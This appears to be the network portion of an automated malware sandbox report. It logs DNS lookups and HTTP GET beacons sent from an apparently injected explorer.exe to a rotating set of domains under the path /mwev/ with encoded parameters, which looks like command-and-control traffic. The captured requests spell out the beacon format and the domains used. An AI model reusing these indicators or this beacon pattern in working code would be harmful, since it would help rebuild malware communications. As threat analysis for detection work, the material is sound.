                                                Dec 2, 2021 20:00:23.170135021 CET4980980192.168.2.435.209.150.94
                                                Dec 2, 2021 20:00:30.049437046 CET4981680192.168.2.4147.255.129.44
                                                Dec 2, 2021 20:00:30.227549076 CET8049816147.255.129.44192.168.2.4
                                                Dec 2, 2021 20:00:30.227710962 CET4981680192.168.2.4147.255.129.44
                                                Dec 2, 2021 20:00:30.227936983 CET4981680192.168.2.4147.255.129.44
                                                Dec 2, 2021 20:00:30.461924076 CET8049816147.255.129.44192.168.2.4
                                                Dec 2, 2021 20:00:30.730988026 CET4981680192.168.2.4147.255.129.44
                                                Dec 2, 2021 20:00:30.732290983 CET8049816147.255.129.44192.168.2.4
                                                Dec 2, 2021 20:00:30.732397079 CET4981680192.168.2.4147.255.129.44
                                                Dec 2, 2021 20:00:30.908973932 CET8049816147.255.129.44192.168.2.4
                                                Dec 2, 2021 20:00:30.909821033 CET4981680192.168.2.4147.255.129.44
                                                Dec 2, 2021 20:00:35.785365105 CET4983480192.168.2.415.197.142.173
                                                Dec 2, 2021 20:00:35.804188013 CET804983415.197.142.173192.168.2.4
                                                Dec 2, 2021 20:00:35.804287910 CET4983480192.168.2.415.197.142.173
                                                Dec 2, 2021 20:00:35.804476976 CET4983480192.168.2.415.197.142.173
                                                Dec 2, 2021 20:00:35.823292017 CET804983415.197.142.173192.168.2.4
                                                Dec 2, 2021 20:00:36.003988981 CET804983415.197.142.173192.168.2.4
                                                Dec 2, 2021 20:00:36.004034996 CET804983415.197.142.173192.168.2.4
                                                Dec 2, 2021 20:00:36.004340887 CET4983480192.168.2.415.197.142.173
                                                Dec 2, 2021 20:00:36.134852886 CET4983480192.168.2.415.197.142.173
                                                Dec 2, 2021 20:00:36.153865099 CET804983415.197.142.173192.168.2.4
                                                Dec 2, 2021 20:00:41.210109949 CET4985280192.168.2.487.236.16.208
                                                Dec 2, 2021 20:00:41.277066946 CET804985287.236.16.208192.168.2.4
                                                Dec 2, 2021 20:00:41.277260065 CET4985280192.168.2.487.236.16.208
                                                Dec 2, 2021 20:00:41.277611017 CET4985280192.168.2.487.236.16.208
                                                Dec 2, 2021 20:00:41.345006943 CET804985287.236.16.208192.168.2.4
                                                Dec 2, 2021 20:00:41.402823925 CET804985287.236.16.208192.168.2.4
                                                Dec 2, 2021 20:00:41.402864933 CET804985287.236.16.208192.168.2.4
                                                Dec 2, 2021 20:00:41.403094053 CET4985280192.168.2.487.236.16.208
                                                Dec 2, 2021 20:00:41.403291941 CET4985280192.168.2.487.236.16.208
                                                Dec 2, 2021 20:00:41.470031023 CET804985287.236.16.208192.168.2.4
                                                Dec 2, 2021 20:00:46.486143112 CET4985780192.168.2.423.227.38.74
                                                Dec 2, 2021 20:00:46.503976107 CET804985723.227.38.74192.168.2.4
                                                Dec 2, 2021 20:00:46.504163980 CET4985780192.168.2.423.227.38.74
                                                Dec 2, 2021 20:00:46.504425049 CET4985780192.168.2.423.227.38.74
                                                Dec 2, 2021 20:00:46.522779942 CET804985723.227.38.74192.168.2.4
                                                Dec 2, 2021 20:00:46.553481102 CET804985723.227.38.74192.168.2.4
                                                Dec 2, 2021 20:00:46.553522110 CET804985723.227.38.74192.168.2.4
                                                Dec 2, 2021 20:00:46.553544044 CET804985723.227.38.74192.168.2.4
                                                Dec 2, 2021 20:00:46.553566933 CET804985723.227.38.74192.168.2.4
                                                Dec 2, 2021 20:00:46.553586006 CET804985723.227.38.74192.168.2.4
                                                Dec 2, 2021 20:00:46.553596973 CET804985723.227.38.74192.168.2.4
                                                Dec 2, 2021 20:00:46.553838015 CET4985780192.168.2.423.227.38.74
                                                Dec 2, 2021 20:00:46.554032087 CET4985780192.168.2.423.227.38.74
                                                Dec 2, 2021 20:00:46.554157972 CET804985723.227.38.74192.168.2.4
                                                Dec 2, 2021 20:00:46.554244995 CET4985780192.168.2.423.227.38.74
                                                Dec 2, 2021 20:00:51.628223896 CET4985980192.168.2.4142.250.203.115
                                                Dec 2, 2021 20:00:51.645632029 CET8049859142.250.203.115192.168.2.4
                                                Dec 2, 2021 20:00:51.645771027 CET4985980192.168.2.4142.250.203.115
                                                Dec 2, 2021 20:00:51.645944118 CET4985980192.168.2.4142.250.203.115
                                                Dec 2, 2021 20:00:51.663521051 CET8049859142.250.203.115192.168.2.4
                                                Dec 2, 2021 20:00:51.680239916 CET8049859142.250.203.115192.168.2.4
                                                Dec 2, 2021 20:00:51.680383921 CET8049859142.250.203.115192.168.2.4
                                                Dec 2, 2021 20:00:51.680500031 CET4985980192.168.2.4142.250.203.115
                                                Dec 2, 2021 20:00:51.680620909 CET4985980192.168.2.4142.250.203.115
                                                Dec 2, 2021 20:00:51.698009014 CET8049859142.250.203.115192.168.2.4
                                                Dec 2, 2021 20:00:56.876818895 CET4987380192.168.2.4198.143.147.58
                                                Dec 2, 2021 20:00:57.042452097 CET8049873198.143.147.58192.168.2.4
                                                Dec 2, 2021 20:00:57.042573929 CET4987380192.168.2.4198.143.147.58
                                                Dec 2, 2021 20:00:57.042764902 CET4987380192.168.2.4198.143.147.58
                                                Dec 2, 2021 20:00:57.208177090 CET8049873198.143.147.58192.168.2.4
                                                Dec 2, 2021 20:00:57.434561014 CET8049873198.143.147.58192.168.2.4
                                                Dec 2, 2021 20:00:57.434598923 CET8049873198.143.147.58192.168.2.4
                                                Dec 2, 2021 20:00:57.434801102 CET4987380192.168.2.4198.143.147.58
                                                Dec 2, 2021 20:00:57.434843063 CET4987380192.168.2.4198.143.147.58
                                                Dec 2, 2021 20:00:57.600678921 CET8049873198.143.147.58192.168.2.4
                                                Dec 2, 2021 20:01:02.493794918 CET4990080192.168.2.4107.164.242.49
                                                Dec 2, 2021 20:01:02.663944006 CET8049900107.164.242.49192.168.2.4
                                                Dec 2, 2021 20:01:02.664150953 CET4990080192.168.2.4107.164.242.49
                                                Dec 2, 2021 20:01:02.664268970 CET4990080192.168.2.4107.164.242.49
                                                Dec 2, 2021 20:01:02.834525108 CET8049900107.164.242.49192.168.2.4
                                                Dec 2, 2021 20:01:02.834745884 CET8049900107.164.242.49192.168.2.4
                                                Dec 2, 2021 20:01:02.834858894 CET8049900107.164.242.49192.168.2.4
                                                Dec 2, 2021 20:01:02.835042000 CET4990080192.168.2.4107.164.242.49
                                                Dec 2, 2021 20:01:02.835110903 CET4990080192.168.2.4107.164.242.49
                                                Dec 2, 2021 20:01:03.005115032 CET8049900107.164.242.49192.168.2.4
                                                Dec 2, 2021 20:01:07.871548891 CET4990880192.168.2.434.102.136.180
                                                Dec 2, 2021 20:01:07.890765905 CET804990834.102.136.180192.168.2.4
                                                Dec 2, 2021 20:01:07.890892029 CET4990880192.168.2.434.102.136.180
                                                Dec 2, 2021 20:01:07.891082048 CET4990880192.168.2.434.102.136.180
                                                Dec 2, 2021 20:01:07.910243034 CET804990834.102.136.180192.168.2.4

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Dec 2, 2021 20:00:13.718374014 CET5172653192.168.2.48.8.8.8
                                                Dec 2, 2021 20:00:13.740935087 CET53517268.8.8.8192.168.2.4
                                                Dec 2, 2021 20:00:18.953963995 CET5662753192.168.2.48.8.8.8
                                                Dec 2, 2021 20:00:18.978465080 CET53566278.8.8.8192.168.2.4
                                                Dec 2, 2021 20:00:24.642744064 CET6311653192.168.2.48.8.8.8
                                                Dec 2, 2021 20:00:24.687735081 CET53631168.8.8.8192.168.2.4
                                                Dec 2, 2021 20:00:29.723052025 CET6407853192.168.2.48.8.8.8
                                                Dec 2, 2021 20:00:30.047213078 CET53640788.8.8.8192.168.2.4
                                                Dec 2, 2021 20:00:35.755206108 CET6480153192.168.2.48.8.8.8
                                                Dec 2, 2021 20:00:35.783483028 CET53648018.8.8.8192.168.2.4
                                                Dec 2, 2021 20:00:41.153199911 CET6172153192.168.2.48.8.8.8
                                                Dec 2, 2021 20:00:41.207889080 CET53617218.8.8.8192.168.2.4
                                                Dec 2, 2021 20:00:46.457046032 CET5125553192.168.2.48.8.8.8
                                                Dec 2, 2021 20:00:46.485023975 CET53512558.8.8.8192.168.2.4
                                                Dec 2, 2021 20:00:51.564862967 CET5233753192.168.2.48.8.8.8
                                                Dec 2, 2021 20:00:51.625777960 CET53523378.8.8.8192.168.2.4
                                                Dec 2, 2021 20:00:56.692248106 CET4961253192.168.2.48.8.8.8
                                                Dec 2, 2021 20:00:56.875401020 CET53496128.8.8.8192.168.2.4
                                                Dec 2, 2021 20:01:02.459018946 CET4928553192.168.2.48.8.8.8
                                                Dec 2, 2021 20:01:02.492113113 CET53492858.8.8.8192.168.2.4
                                                Dec 2, 2021 20:01:07.847434998 CET5060153192.168.2.48.8.8.8
                                                Dec 2, 2021 20:01:07.869749069 CET53506018.8.8.8192.168.2.4
                                                Dec 2, 2021 20:01:13.021336079 CET6087553192.168.2.48.8.8.8
                                                Dec 2, 2021 20:01:13.193341970 CET53608758.8.8.8192.168.2.4
                                                Dec 2, 2021 20:01:18.595891953 CET5644853192.168.2.48.8.8.8
                                                Dec 2, 2021 20:01:18.621252060 CET53564488.8.8.8192.168.2.4

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                Dec 2, 2021 20:00:13.718374014 CET192.168.2.48.8.8.80x3d58Standard query (0)www.royallecleaning.comA (IP address)IN (0x0001)
                                                Dec 2, 2021 20:00:18.953963995 CET192.168.2.48.8.8.80x3e8cStandard query (0)www.scion-go-getter.comA (IP address)IN (0x0001)
                                                Dec 2, 2021 20:00:24.642744064 CET192.168.2.48.8.8.80x2b1aStandard query (0)www.sandman.networkA (IP address)IN (0x0001)
                                                Dec 2, 2021 20:00:29.723052025 CET192.168.2.48.8.8.80xf5b8Standard query (0)www.21yingyang.comA (IP address)IN (0x0001)
                                                Dec 2, 2021 20:00:35.755206108 CET192.168.2.48.8.8.80x5843Standard query (0)www.texascountrycharts.comA (IP address)IN (0x0001)
                                                Dec 2, 2021 20:00:41.153199911 CET192.168.2.48.8.8.80xc300Standard query (0)www.tikomobile.storeA (IP address)IN (0x0001)
                                                Dec 2, 2021 20:00:46.457046032 CET192.168.2.48.8.8.80xd203Standard query (0)www.fulvousemollientplanet.comA (IP address)IN (0x0001)
                                                Dec 2, 2021 20:00:51.564862967 CET192.168.2.48.8.8.80x67b7Standard query (0)www.experimentwithoutlimits.comA (IP address)IN (0x0001)
                                                Dec 2, 2021 20:00:56.692248106 CET192.168.2.48.8.8.80xd2e9Standard query (0)www.websitessample.comA (IP address)IN (0x0001)
                                                Dec 2, 2021 20:01:02.459018946 CET192.168.2.48.8.8.80x70c8Standard query (0)www.foxandmew.comA (IP address)IN (0x0001)
                                                Dec 2, 2021 20:01:07.847434998 CET192.168.2.48.8.8.80x46b4Standard query (0)www.9linefarms.comA (IP address)IN (0x0001)
                                                Dec 2, 2021 20:01:13.021336079 CET192.168.2.48.8.8.80xf31eStandard query (0)www.rip-online.comA (IP address)IN (0x0001)
                                                Dec 2, 2021 20:01:18.595891953 CET192.168.2.48.8.8.80x2ac0Standard query (0)www.fourthandwhiteoak.comA (IP address)IN (0x0001)

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                Dec 2, 2021 20:00:13.740935087 CET8.8.8.8192.168.2.40x3d58No error (0)www.royallecleaning.comroyallecleaning.comCNAME (Canonical name)IN (0x0001)
                                                Dec 2, 2021 20:00:13.740935087 CET8.8.8.8192.168.2.40x3d58No error (0)royallecleaning.com34.102.136.180A (IP address)IN (0x0001)
                                                Dec 2, 2021 20:00:18.978465080 CET8.8.8.8192.168.2.40x3e8cNo error (0)www.scion-go-getter.com35.209.150.94A (IP address)IN (0x0001)
                                                Dec 2, 2021 20:00:24.687735081 CET8.8.8.8192.168.2.40x2b1aName error (3)www.sandman.networknonenoneA (IP address)IN (0x0001)
                                                Dec 2, 2021 20:00:30.047213078 CET8.8.8.8192.168.2.40xf5b8No error (0)www.21yingyang.com147.255.129.44A (IP address)IN (0x0001)
                                                Dec 2, 2021 20:00:35.783483028 CET8.8.8.8192.168.2.40x5843No error (0)www.texascountrycharts.comtexascountrycharts.comCNAME (Canonical name)IN (0x0001)
                                                Dec 2, 2021 20:00:35.783483028 CET8.8.8.8192.168.2.40x5843No error (0)texascountrycharts.com15.197.142.173A (IP address)IN (0x0001)
                                                Dec 2, 2021 20:00:35.783483028 CET8.8.8.8192.168.2.40x5843No error (0)texascountrycharts.com3.33.152.147A (IP address)IN (0x0001)
                                                Dec 2, 2021 20:00:41.207889080 CET8.8.8.8192.168.2.40xc300No error (0)www.tikomobile.store87.236.16.208A (IP address)IN (0x0001)
                                                Dec 2, 2021 20:00:46.485023975 CET8.8.8.8192.168.2.40xd203No error (0)www.fulvousemollientplanet.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                Dec 2, 2021 20:00:46.485023975 CET8.8.8.8192.168.2.40xd203No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                Dec 2, 2021 20:00:51.625777960 CET8.8.8.8192.168.2.40x67b7No error (0)www.experimentwithoutlimits.comghs.googlehosted.comCNAME (Canonical name)IN (0x0001)
                                                Dec 2, 2021 20:00:51.625777960 CET8.8.8.8192.168.2.40x67b7No error (0)ghs.googlehosted.com142.250.203.115A (IP address)IN (0x0001)
                                                Dec 2, 2021 20:00:56.875401020 CET8.8.8.8192.168.2.40xd2e9No error (0)www.websitessample.comwebsitessample.comCNAME (Canonical name)IN (0x0001)
                                                Dec 2, 2021 20:00:56.875401020 CET8.8.8.8192.168.2.40xd2e9No error (0)websitessample.com198.143.147.58A (IP address)IN (0x0001)
                                                Dec 2, 2021 20:01:02.492113113 CET8.8.8.8192.168.2.40x70c8No error (0)www.foxandmew.com107.164.242.49A (IP address)IN (0x0001)
                                                Dec 2, 2021 20:01:07.869749069 CET8.8.8.8192.168.2.40x46b4No error (0)www.9linefarms.com9linefarms.comCNAME (Canonical name)IN (0x0001)
                                                Dec 2, 2021 20:01:07.869749069 CET8.8.8.8192.168.2.40x46b4No error (0)9linefarms.com34.102.136.180A (IP address)IN (0x0001)
                                                Dec 2, 2021 20:01:13.193341970 CET8.8.8.8192.168.2.40xf31eNo error (0)www.rip-online.com43.132.183.85A (IP address)IN (0x0001)
                                                Dec 2, 2021 20:01:18.621252060 CET8.8.8.8192.168.2.40x2ac0Name error (3)www.fourthandwhiteoak.comnonenoneA (IP address)IN (0x0001)

                                                HTTP Request Dependency Graph

                                                • www.royallecleaning.com
                                                • www.scion-go-getter.com
                                                • www.21yingyang.com
                                                • www.texascountrycharts.com
                                                • www.tikomobile.store
                                                • www.fulvousemollientplanet.com
                                                • www.experimentwithoutlimits.com
                                                • www.websitessample.com
                                                • www.foxandmew.com
                                                • www.9linefarms.com
                                                • www.rip-online.com

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                0192.168.2.44979534.102.136.18080C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Dec 2, 2021 20:00:13.768181086 CET1548OUTGET /mwev/?-Zf=HsmrIALTvXRwIzSnf5nMI/V00TunQUINtH1bLOqGnVursL/6Yec02BWx+TEJbBuPuFeE&v0GTT=9rntXVQxPfS89pvp HTTP/1.1
                                                Host: www.royallecleaning.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Dec 2, 2021 20:00:13.946948051 CET1559INHTTP/1.1 403 Forbidden
                                                Server: openresty
                                                Date: Thu, 02 Dec 2021 19:00:13 GMT
                                                Content-Type: text/html
                                                Content-Length: 275
                                                ETag: "618be73d-113"
                                                Via: 1.1 google
                                                Connection: close
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                1192.168.2.44980935.209.150.9480C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Dec 2, 2021 20:00:19.110166073 CET2045OUTGET /mwev/?-Zf=Y+Hyy1N7e+ROxQ1BzGerXtl/+e9k+2VYdpmZeNGMnmnYwBGoq47Ntyx8TFdOC4/xH+hS&v0GTT=9rntXVQxPfS89pvp HTTP/1.1
                                                Host: www.scion-go-getter.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                10192.168.2.44990943.132.183.8580C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Dec 2, 2021 20:01:13.388248920 CET5935OUTGET /mwev/?-Zf=4s7fstVSzLCadPpci11R7qAZUnePXrmWLsX7/7GiC0yrg0b/n74rqRMRm0/pECdGagYy&v0GTT=9rntXVQxPfS89pvp HTTP/1.1
                                                Host: www.rip-online.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Dec 2, 2021 20:01:13.579788923 CET5936INHTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Thu, 02 Dec 2021 19:01:13 GMT
                                                Content-Type: text/html
                                                Content-Length: 146
                                                Connection: close
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                2192.168.2.449816147.255.129.4480C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Dec 2, 2021 20:00:30.227936983 CET5708OUTGET /mwev/?-Zf=iTGszEHgBfgYRglEf8qTe/0GehEi8eYY5QDShU32F6t0wDyeZFMPJI0cijyvgJ5fvuvy&v0GTT=9rntXVQxPfS89pvp HTTP/1.1
                                                Host: www.21yingyang.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Dec 2, 2021 20:00:30.732290983 CET5708INHTTP/1.1 404 Not Found
                                                Transfer-Encoding: chunked
                                                Server: Nginx Microsoft-HTTPAPI/2.0
                                                X-Powered-By: Nginx
                                                Date: Thu, 02 Dec 2021 19:00:25 GMT
                                                Connection: close
                                                Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                3192.168.2.44983415.197.142.17380C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Dec 2, 2021 20:00:35.804476976 CET5747OUTGET /mwev/?-Zf=muoWufO8p6lksAUPj07m8fqHwDrNKoj9M2hBle0NDwQN4kTZYCe/nJ8SwFL4fqBvjDWp&v0GTT=9rntXVQxPfS89pvp HTTP/1.1
                                                Host: www.texascountrycharts.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Dec 2, 2021 20:00:36.003988981 CET5749INHTTP/1.1 403 Forbidden
                                                Server: awselb/2.0
                                                Date: Thu, 02 Dec 2021 19:00:35 GMT
                                                Content-Type: text/html
                                                Content-Length: 118
                                                Connection: close
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                4192.168.2.44985287.236.16.20880C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Dec 2, 2021 20:00:41.277611017 CET5789OUTGET /mwev/?-Zf=/zd6oxG+H6qci+O+cHlZDp/zFP0nYcFn0YDhkjhJJtSXAtrcRYu0trJUidLUZZla0YBM&v0GTT=9rntXVQxPfS89pvp HTTP/1.1
                                                Host: www.tikomobile.store
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Dec 2, 2021 20:00:41.402823925 CET5791INHTTP/1.1 404 Not Found
                                                Server: nginx-reuseport/1.21.1
                                                Date: Thu, 02 Dec 2021 19:00:41 GMT
                                                Content-Type: text/html; charset=iso-8859-1
                                                Content-Length: 287
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6d 77 65 76 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 69 6b 6f 6d 6f 62 69 6c 65 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /mwev/ was not found on this server.</p><hr><address>Apache/2.4.10 (Unix) Server at www.tikomobile.store Port 80</address></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                5192.168.2.44985723.227.38.7480C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Dec 2, 2021 20:00:46.504425049 CET5801OUTGET /mwev/?-Zf=vthKUgsgoRJ92n81Fuh07g/ARRJh8nN5iXUIpLSVgoOHRdB6AKBPErPncdrss3E6nFAH&v0GTT=9rntXVQxPfS89pvp HTTP/1.1
                                                Host: www.fulvousemollientplanet.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Dec 2, 2021 20:00:46.553481102 CET5803INHTTP/1.1 403 Forbidden
                                                Date: Thu, 02 Dec 2021 19:00:46 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                X-Sorting-Hat-PodId: -1
                                                X-Dc: gcp-europe-west1
                                                X-Request-ID: 1172709a-00f8-4954-b923-2ab5922ac1c1
                                                X-Content-Type-Options: nosniff
                                                X-Permitted-Cross-Domain-Policies: none
                                                X-XSS-Protection: 1; mode=block
                                                X-Download-Options: noopen
                                                CF-Cache-Status: DYNAMIC
                                                Server: cloudflare
                                                CF-RAY: 6b76cccebf534ebc-FRA
                                                alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73
